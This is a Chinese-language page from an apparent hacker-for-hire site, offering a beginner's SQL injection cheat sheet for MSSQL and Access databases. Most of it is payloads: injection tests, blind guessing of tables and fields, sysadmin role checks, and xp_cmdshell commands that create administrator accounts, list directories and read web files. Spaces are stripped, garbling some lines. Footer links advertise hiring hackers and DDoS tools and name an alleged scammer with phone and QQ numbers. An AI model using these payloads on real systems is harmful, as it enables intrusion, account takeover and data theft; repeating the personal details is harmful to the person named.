黑客大户的联系方式-黑帽黑客入门(如何成为黑客 基础入门

访客3年前关于黑客接单420

1.判断是否有注入
;and1=1
;and1=2

2.初步判断是否是mssql
;anduser>0

3.注入参数是字符
'and[查询条件]and''='

4.搜索时没过滤参数的
'and[查询条件]and'%25'='

5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access

6.猜数据库
;and(SelectCount(*)from[数据库名])>0

7.猜字段
;and(SelectCount(字段名)from数据库名)>0

8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0

9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0

(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0

10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--

12.(1)遍历目录
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:\'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin('上步得到的paths'))>)

(2)遍历目录
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:\';--获得子目录列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:\';--获得所有子目录的目录树结构
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:\web\index.asp';--查看文件的内容

相关文章

浏览被黑客攻击的网站(黑客攻击模拟网站)-专业解冻qq黑客联系方式

浏览被黑客攻击的网站(黑客攻击模拟网站)-专业解冻qq黑客联系方式

浏览被黑客攻击的网站(黑客攻击模拟网站)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑...

网上买的黑客书是真的吗(黑客论坛网)-警察是怎么抓到黑客的

网上买的黑客书是真的吗(黑客论坛网)-警察是怎么抓到黑客的

网上买的黑客书是真的吗(黑客论坛网)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业...

淘宝商品详情页怎么制作,5分钟淘宝商品详情页速成模板

一说到宝贝详情,许多 初学者商家的宝贝详情不想说,看一眼就了解是啥难题,還是便是宝贝详情的产品卖点如何提炼出,顾客都不待见,造成 商家们都不知道如何下手,老实巴交说,老是埋怨,店面所出現的难题就可...

ddos测压(ddos测压网站)

ddos测压(ddos测压网站)

本文导读目录: 1、DDOS网络攻击的类型有哪些 2、ddos压力测试有提供的吗 3、目前最好用的DDOS软件 4、求一个DDOS压力测试的免费软件! 5、怎么判断自己的服务器是被压测...

开房记录可以查到几年之内

. 蒸汽眼罩对缓解眼睛疲劳有一定效果,但并不是任何人都能使用的,除此之外,很多人会戴着蒸汽眼罩睡觉,一夜就这样过去了,那么,蒸汽眼罩可以戴一夜吗?要注意什么?下面友谊长存小编就来说说。 蒸汽眼罩可...

【曝光骗子】QQ2602538659,手机号17623340394!

今天要揭破一个骗子,性别:男,年数:约20岁,姓名:袁开勇,QQ:2602538659,手机号/支付宝/微信:17623340394,另有个微信号:yky2602538659,贵州遵义人,现居厦门事情...